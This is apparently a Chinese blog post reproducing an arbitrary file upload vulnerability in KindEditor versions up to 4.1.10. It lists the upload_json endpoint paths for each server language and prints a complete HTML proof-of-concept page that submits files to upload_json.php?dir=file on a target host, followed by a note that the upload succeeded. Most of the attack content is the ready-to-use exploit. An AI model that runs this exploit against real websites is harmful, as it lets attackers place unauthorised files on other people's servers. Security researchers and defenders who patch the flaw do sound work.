一 、漏洞影响范围
kindeditor版本<=4.1.10
二 、漏洞复现
查看kindeditor版本:
http://x.x.x.x/kindeditor-4.1.10/kindeditor.js // kindeditor-4.1.10 可尝试替换为 kindeditor
image.png
根据脚本语言自定义不同的上传地址来验证文件 upload_json.*,常见判断路径如下:
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
我这里采用php搭建,所以路径为:
http://x.x.x.x/kindeditor-4.1.10/php/demo.php
返回200 OK 证明存在
image.png
利用poc如下:
<html>
<head>
<title>Uploader</title>
<script src="http://x.x.x.x/kindeditor-4.1.10/kindeditor.js"></script>
<script>
KindEditor.ready(function (K) {
var uploadbutton = K.uploadbutton({
button: K('#uploadButton')[0],
fieldName: 'imgFile',
url: 'http://x.x.x.x/kindeditor-4.1.10/php/upload_json.php?dir=file',
afterUpload: function (data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);
}
},
});
uploadbutton.fileBox.change(function (e) {
uploadbutton.submit();
});
});
</script>
</head>
<body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>
<input type="button" id="uploadButton" value="Upload"/>
</div>
</body>
</html>
上传成功
image.png
网友评论